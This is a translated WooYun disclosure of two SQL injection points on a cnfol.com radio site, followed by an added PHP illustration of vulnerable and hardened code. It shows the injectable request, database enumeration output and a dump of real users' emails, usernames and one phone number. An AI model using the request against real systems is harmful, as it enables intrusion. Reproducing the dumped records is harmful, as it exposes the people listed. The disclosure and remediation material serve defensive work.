
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2015-0134191

Title: Two MySQL injection points on a 中金在线 (cnfol.com) site (phone number / email disclosure)

Vendor: 福建中金在线网络股份有限公司

Author: 路人甲

Submitted: 2015-08-15 15:48

Fix time: 2015-10-01 09:22

Published: 2015-10-01 09:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-08-15: Details sent to the vendor; awaiting vendor handling
2015-08-17: Vendor confirmed; details disclosed to the vendor only
2015-08-27: Details disclosed to core white hats and domain experts
2015-09-06: Details disclosed to regular white hats
2015-09-16: Details disclosed to intern white hats
2015-10-01: Details disclosed to the public

Brief description:

Phone numbers + email addresses

Details:

POST-parameter injection (the injectable parameter is `offset` in the request below)

POST /index.php?r=Radiostation/MoreMingjia HTTP/1.1
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
Referer: http://radio.3g.cnfol.com/
Host: radio.3g.cnfol.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
offset=1


[Image: 1.jpg]


[Image: 2.jpg]


[Image: 3.jpg]


database management system users privileges:
[*] %fol_g3zbrd% [1]:
privilege: USAGE


available databases [3]:
[*] cnfol_zjcj
[*] information_schema
[*] test


Database: cnfol_zjcj
[38 tables]
+---------------------+
| Activity |
| Bl_Install |
| Bl_Keywords |
| Bl_Reflex |
| Bl_UserMobile |
| Bl_classify |
| Bl_contentfilter |
| Bl_resource |
| Bl_user |
| GK_AttenList |
| Invitation |
| InvitationCode |
| InvitationExchange |
| WdtVoice |
| WdtVoiceCount |
| backupZjcj_group |
| bk_blacklist |
| bk_flower |
| bk_group |
| bk_live |
| bl_con |
| bl_ref |
| bl_secret |
| syslog |
| tbAppStock |
| tbUserStockOptional |
| unscramble |
| unscramblexx |
| weidiantai1 |
| zjcj_androiddevice |
| zjcj_content |
| zjcj_content_201507 |
| zjcj_group |
| zjcj_iosdevice |
| zjcj_operate |
| zjcj_user |
| zjcj_userchat |
| zjcj_userjoin |
+---------------------+


+-----------------+--------------+-------------+-------------+-------------+--------+
| email | userName | userNick | replyNumber | mobile | manage |
+-----------------+--------------+-------------+-------------+-------------+--------+
| aaa@hotmail.com | pzpz | pzpz | 0 | <blank> | 1 |
| <blank> | 5518 | 天顺居士 | 0 | <blank> | 0 |
| <blank> | woshishui | chaochao | 0 | <blank> | 0 |
| <blank> | qiyongwei123 | qiyw | 0 | <blank> | 0 |
| 1blog3@163.com | blog | blog1 | 0 | <blank> | 1 |
| buluo@163.com | buluo | buluo | 0 | <blank> | 0 |
| sq@hotmail.com | sq | 舒淇 | 0 | <blank> | 0 |
| ds@hotmail.com | ds | 大S | 0 | <blank> | 0 |
| <blank> | wqh | wqh | 0 | <blank> | 0 |
| <blank> | kx | 开心果 | 0 | <blank> | 0 |
| <blank> | ly | 驴行天下1 | 0 | <blank> | 0 |
| aa@78.com | hihi | hihi | 0 | <blank> | 1 |
| <blank> | ns | 超级女生 | 0 | <blank> | 0 |
| bdjs@sohu.com | bdjs | bdjs | 0 | <blank> | 0 |
| <blank> | syatao | syatao | 0 | <blank> | 0 |
| sp@hotmail.com | sp | 水皮1 | 0 | <blank> | 0 |
| <blank> | fomu998 | 灯下读贴 | 0 | <blank> | 0 |
| <blank> | 66236F | 662368 | 0 | <blank> | 0 |
| <blank> | zzm680920 | 吉利一尘 | 0 | <blank> | 0 |
| <blank> | gaofenger | gaofenger | 0 | <blank> | 0 |
| <blank> | jmlu62426 | mingming405 | 0 | <blank> | 0 |
| <blank> | jack_cchen | jackcchen | 0 | <blank> | 0 |
| <blank> | aris2370 | aris2370 | 0 | <blank> | 0 |
| <blank> | tigerhu188 | 金天传奇 | 0 | <blank> | 0 |
| <blank> | nec511 | 冷 心 | 0 | <blank> | 0 |
| <blank> | gaoshang99 | gaoshang99 | 0 | <blank> | 0 |
| <blank> | A9818 | 剑杰8 | 0 | <blank> | 0 |
| <blank> | lw520165 | saxon鱼 | 0 | <blank> | 0 |
| <blank> | pigliwu | 中金用户PH | 0 | <blank> | 0 |
| <blank> | lifhaihe | lftj | 0 | 13821389989 | 0 |
| <blank> | x46134587 | 温暖梦想 | 0 | <blank> | 0 |
| <blank> | sabatilla | sabatilla | 0 | <blank> | 0 |
| <blank> | wgx168 | wgx168 | 0 | <blank> | 0 |
| <blank> | laoynihao | 逍遥啊鹰 | 0 | <blank> | 0 |
| <blank> | wwyymm2005 | 肥肥2005 | 0 | <blank> | 0 |


=========================================================
Second injection point

http://radio.3g.cnfol.com/index-test.php?id=&r=Radiostation/Dragonfly


Injectable parameter: id
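Both findings on this page are the same defect: a request parameter (`offset` via POST, `id` via GET) reaches MySQL as SQL text rather than as a bound value. The following is an added illustration, not code from the page or from the cnfol.com application; the action names, the use of `offset` in a LIMIT clause, the `id` lookup, and the PDO connection are assumptions. The table and column names (`zjcj_user`, `userName`, `userNick`) are taken from the dump shown above.

```php
<?php
// Added illustration; not the vendor's code. Assumes Yii-style actions
// behind index.php?r=Radiostation/MoreMingjia and ?r=Radiostation/Dragonfly
// (assumption), backed by a PDO MySQL connection.

// VULNERABLE pattern: the raw request value is concatenated into the query,
// so any non-numeric value is parsed by MySQL as SQL rather than as data.
function moreMingjiaVulnerable(PDO $db, array $post): array
{
    $offset = $post['offset'] ?? '0';
    $sql = "SELECT userName, userNick FROM zjcj_user ORDER BY userName LIMIT 20 OFFSET $offset";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: validate the parameter as a non-negative integer first, then bind
// it through a prepared statement so the value can never alter query structure.
function moreMingjiaHardened(PDO $db, array $post): array
{
    $offset = filter_var(
        $post['offset'] ?? 0,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]
    );
    if ($offset === false) {
        http_response_code(400);   // reject rather than "clean up" the input
        return [];
    }
    // Server-side prepares; LIMIT/OFFSET placeholders must be bound as integers.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $db->prepare(
        'SELECT userName, userNick FROM zjcj_user ORDER BY userName LIMIT 20 OFFSET :offset'
    );
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The GET parameter of the second endpoint gets the same treatment. Note that
// the page's second URL sends id= empty: an empty string must fail validation
// here instead of being dropped into the query as nothing.
function dragonflyHardened(PDO $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $db->prepare('SELECT userName, userNick FROM zjcj_user WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The validation step matters on its own, not only as defence in depth: the sqlmap output above shows the application account holds USAGE on `cnfol_zjcj`, so once the query text is attacker-controlled, every table in that database (including the email and mobile columns of `zjcj_user`) is readable. Binding the value as `PDO::PARAM_INT` after `filter_var` also avoids the MySQL syntax error that a string-bound LIMIT value produces.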

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-08-17 09:20

Vendor reply:

Thank you, we will fix the vulnerability immediately.

Latest status:

None yet